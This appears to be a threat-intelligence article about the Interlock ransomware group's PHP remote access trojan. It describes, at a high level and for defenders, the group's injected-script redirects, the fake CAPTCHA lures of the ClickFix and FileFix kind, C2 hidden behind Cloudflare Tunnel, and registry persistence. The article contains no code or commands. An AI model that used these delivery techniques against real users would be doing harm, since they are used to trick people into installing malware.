Interlock RAT
Cybercriminals behind the Interlock ransomware operation are escalating their efforts with a newly developed PHP variant of their custom remote access trojan (RAT), Interlock RAT, also known as NodeSnake. This upgraded threat has been observed in a widespread campaign using an evolved delivery mechanism dubbed FileFix, an offshoot of the previously known ClickFix technique. The development marks a significant shift in the group's attack strategy, expanding their reach and demonstrating increasing technical sophistication.
Table of Contents
Stealthy Entry: Script Injection and Traffic Redirection
The campaign, active since May 2025, begins with compromised websites injected with a seemingly benign single-line JavaScript snippet buried in the HTML code. This script functions as a traffic distribution system (TDS), employing IP-based filtering to redirect targeted visitors to fake CAPTCHA verification pages. These fraudulent pages rely on ClickFix-based lures to trick users into executing malicious PowerShell scripts. The result is the installation of Interlock RAT, granting attackers a foothold in the victim's system.
FileFix: A Weaponized Delivery Innovation
The latest campaigns observed in June 2025 showcase the use of FileFix, a more advanced version of ClickFix, as the core infection vector. FileFix exploits the Windows File Explorer's address bar to socially engineer users into running malicious commands. Originally demonstrated as a proof-of-concept in June 2025, FileFix has now been operationalized to distribute the PHP variant of Interlock RAT, and in some cases, this deployment acts as a precursor to the installation of the more traditional Node.js-based variant.
Multi-Stage Payloads and Stealth Capabilities
Once deployed, Interlock RAT initiates host reconnaissance and system information exfiltration in JSON format. It checks for privilege levels (USER, ADMIN, or SYSTEM) and establishes contact with a remote command-and-control (C2) server. Additional payloads, either EXE or DLL files, are fetched for execution.
- Persistence mechanisms include:
- Modifying the Windows Registry to maintain startup execution.
- Enabling lateral movement through Remote Desktop Protocol (RDP) access.
Moreover, a notable evasion technique involves the use of Cloudflare Tunnel subdomains, masking the C2 server's actual location. Hard-coded IP addresses serve as backups to maintain connectivity if the tunnels are disrupted.
Tracking the Threat: Past Targets and Present Motives
Earlier in 2025, Interlock RAT was involved in attacks on local government and educational institutions in the UK, leveraging the Node.js variant. However, the recent shift to PHP, a common web development language, suggests a more opportunistic approach targeting a wider range of industries. The transition to PHP indicates a tactical decision to broaden infection vectors, potentially exploiting vulnerable web-based infrastructures.
Key Indicators of the Campaign
Victims and cybersecurity operatives should be alert to the following hallmarks of Interlock's latest operations:
Initial Attack Vector:
- Single-line JavaScript injections on legitimate but compromised websites.
- Redirection to fake CAPTCHA pages using IP filtering.
Malware Behavior Post-Infection:
- Host reconnaissance and JSON-formatted system info exfiltration.
- Privilege checks and remote payload execution.
- Registry-based persistence and RDP exploitation for movement.
Conclusion: Interlock Group’s Growing Threat Profile
The emergence of the PHP variant of Interlock RAT demonstrates the group's growing versatility and intent to stay ahead of defensive countermeasures. By leveraging both web scripting and native system features, Interlock attackers are blurring the lines between traditional malware delivery and creative abuse of everyday system functionalities. Security teams should remain vigilant and implement layered defenses to detect and block such evolving threats.
